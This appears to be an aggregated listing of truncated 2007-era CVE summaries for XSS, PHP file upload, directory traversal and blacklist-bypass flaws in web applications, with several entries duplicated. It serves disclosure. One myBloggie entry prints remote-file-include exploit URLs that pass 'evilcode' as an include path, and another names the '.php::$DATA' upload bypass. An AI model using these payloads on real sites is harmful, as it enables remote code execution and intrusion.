Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in InterWorx Hosting Control Panel InterWorx-CP Server Admin Level NodeWorx 3.0.2 1 allow remote attackers to inject arbitrary web script or HTML via the PATHINFO to index.php; and allow remote authenticated users to inject arbitrary web script or...

Unrestricted file upload

Unrestricted file upload vulnerability in banner-upload.php in Szymon Kosok Best Top List allows remote attackers to upload and execute arbitrary PHP files in banners/...

CVE-2007-4376

Unrestricted file upload vulnerability in banner-upload.php in Szymon Kosok Best Top List allows remote attackers to upload and execute arbitrary PHP files in banners/...

CVE-2007-4376

Unrestricted file upload vulnerability in banner-upload.php in Szymon Kosok Best Top List allows remote attackers to upload and execute arbitrary PHP files in banners/...

CVE-2007-4376

CVE-2007-4376 describes an unrestricted file upload vulnerability in banner-upload.php of the Szymon Kosok Best Top List. This allows remote attackers to upload and execute arbitrary PHP files in the banners/ directory. The provided documents do not include explicit root-cause details beyond the ...

Unrestricted file upload

Unrestricted file upload vulnerability in admin/pages/blog-add.php in Neuron Blog 1.1 allows remote attackers to upload and execute arbitrary PHP files in uploads/...

CVE-2007-4371

Unrestricted file upload vulnerability in admin/pages/blog-add.php in Neuron Blog 1.1 allows remote attackers to upload and execute arbitrary PHP files in uploads/...

CVE-2007-4371

Unrestricted file upload vulnerability in admin/pages/blog-add.php in Neuron Blog 1.1 allows remote attackers to upload and execute arbitrary PHP files in uploads/...

CVE-2007-4088

Multiple cross-site scripting XSS vulnerabilities in Vikingboard 0.1.2 allow remote attackers to inject arbitrary web script or HTML via the 1 id, 2 f, 3 quote, and 4 act parameters to cp.php; the 5 u parameter to user.php; the 6 f parameter to post.php; the 7 s parameter to topic.php; the 8 quot...

Directory traversal

Multiple directory traversal vulnerabilities in Maia Mailguard 1.0.2 and earlier might allow remote attackers to read arbitrary files via a .. dot dot in the 1 prevlang and 2 super parameters to a php/login.php; the 3 charset parameter to a php/login.php, b php/internal-init.php, and c...

CVE-2007-3163

Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2.4.2 allows remote attackers to upload arbitrary .php files via an alternate data stream syntax, as demonstrated by .php::$DATA filenames, a related issue to CVE-2006-0658...

CVE-2007-3163

Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2.4.2 allows remote attackers to upload arbitrary .php files via an alternate data stream syntax, as demonstrated by .php::$DATA filenames, a related issue to CVE-2006-0658...

myBloggie 2.1.5 Remote File Include

myBloggie 2.1.5 RFI Author: Yaser [email protected] Homepage: http://www.ayyildiz.org Download S : http://mywebland.com/download.php?id=19 Exploits: http://site/config.php?bloggierootpath=evilcode? http://site/includes/db.php?bloggierootpath=evilcode?...

Unrestricted file upload

Unrestricted file upload vulnerability in FileCloset before 1.1.5 allows remote attackers to upload arbitrary PHP files via unspecified vectors...

CVE-2007-2961

Unrestricted file upload vulnerability in FileCloset before 1.1.5 allows remote attackers to upload arbitrary PHP files via unspecified vectors...

CVE-2007-2961

CVE-2007-2961 concerns an Unrestricted file upload vulnerability in FileCloset before 1.1.5. The issue allows remote attackers to upload arbitrary PHP files via unspecified vectors. The NVD entry records a CVSSv2 base score of 7.5 (HIGH) with network attack vector and no authentication required; ...

CVE-2007-2630

Incomplete blacklist vulnerability in filemanager/browser/default/connectors/php/config.php in the FCKeditor module, as used in ActiveCampaign 1-2-All aka 12All 4.50 through 4.53.13, and possibly other products, allows remote authenticated administrators to upload and possibly execute .php4 and...

CVE-2007-2630

The CVE-2007-2630 entry concerns an Incomplete blacklist vulnerability in the FCKeditor module’s filemanager/browse paths (config.php) used by ActiveCampaign 1-2-All (12All) versions 4.50–4.53.13. The issue allows remote authenticated administrators to upload and possibly execute .php4/.php5 file...

CVE-2007-0609

Directory traversal vulnerability in Advanced Guestbook 2.4.2 allows remote attackers to bypass .htaccess settings, and execute arbitrary PHP local files or read arbitrary local templates, via a .. dot dot in a lang cookie, followed by a filename without its .php extension, as demonstrated via a...

Directory traversal

shared/code/tcetmx.php in TCExam 4.0.011 and earlier allows remote attackers to create arbitrary PHP files in cache/ by placing file contents and directory traversal manipulations into a SessionUserLang cookie to public/code/index.php...